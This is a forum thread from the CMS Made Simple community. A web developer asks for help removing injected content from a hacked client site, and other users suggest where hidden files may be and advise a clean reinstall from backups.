CMS Made Simple Forums

So I have a client on IX web hosting, that got hacked. The hacker didnt remove anything, but added his hack to the top of all pages.


I cant seem to remove it at all. Its on all pages. I re-uploaded all the newest CMS files and ran the upgrade. I still cant remove it. Its on the front end, and the admin panel.

any ideas?

http://www.hereshope.org/index.php


IX doesnt seem to helpful in any of this. I plan on moving this client of IX, and on to my server, I just fear this is in the mysql or something.



thanks.

so some how, the hacker is injecting code above the CMS generated html/php.
is above all the normal doctype info

Ya, and I'm not sure if it's a coincidence or not, but your admin log in popped some errors that referenced the calendar module...which may be related !?

http://www.hereshope.org/modules/Calend ... module.php

Were those errors there before?

Looks like the site is down to fix, good luck!

EDIT
Oh, and it looks like H-Sphere hosting which I have and can access some H-Sphere gurus if you really think that's part of the problem!

yeah, those errors where there before. Its an IX web issue.


Yes, I added in a new index.html file for now.

What version were you using when you were hacked?

It looks like the global metadata field has been changed. If it was in the db, you'd be able to see it in the Site Admin/Global Settings.

I bet someone has compromised a root access account on the server. Do you know if other sites on the host have been hacked?

Nullig

all 3 sites on this IX account where added to with some added php files. I removed them.

I did look at the global settings, nothing.


it was running an older version 1.0 CMS. I have them on 1.2.3 now, upgrade went well. But I can seem to remove their addition.


I really dislike IX. this is not the first time this clients account has been hacked. a year ago some one got it, and erased the index.php file. and put up their own deal. I replace the file, and all was fine again. this hack seems much worse.

IX claimed they got in from a weak ftp pass. I dont know how a 10 character user, and 22 character pass (both with uppers, lowers & numbers) are weak.

You might not have the necessary rights to delete the files...ask the host or try running File Ownership from H-Sphere control panel to gain file ownership then try deleting again.

GOOD LUCK!!

so I deleated all the CMS files, and re-uploaded.



Still there.

any thoughts?


I did do a mysql phpmyadmin search of all tables for some of the content shown, and nothing was found.

.htaccess file?
Files in other directories?

Nullig

found it.


looks like there was some scripts hiding in the root. the attack probably came in via a hole in apache. There was file hidden everywhere.


I think i found it in the modules and it some how was generating its own modules call. I didnt see it the first time I replaced modules, since I was replacing modules folder by folder.

Hello,

I think, when cracked, the question is not "cant find files to be removed". The most important is to wipe out everything (folders and database), to make a clean install from scratch and to restore a db clean backup. Any other procedure is prone to miss some hidden poison file somewhere.

BTW, latest official stable is 1.2.4 (not 1.2.3).

Pierre M.

So should i dont move the DB tables either? I wasnt planning on moving any CMS files off that server.


any suggestions on how to clean the DB? i assume comb through each page and copy and paste out for a fresh install?

I think Pierre's suggestion "to make a clean install from scratch and to restore a db clean backup" is probably the best/right answer.

You question seems to imply there might not be a clean DB backup to restore ?

The ideal would be to have many days/weeks of DB backups and to 'roll back' to a clean backup of files and databases, as available.

Here's an interesting read for backing up files and databases, A small guide to CMSMS Backup.

I know this may not help you, now, but hopefully you and others in the future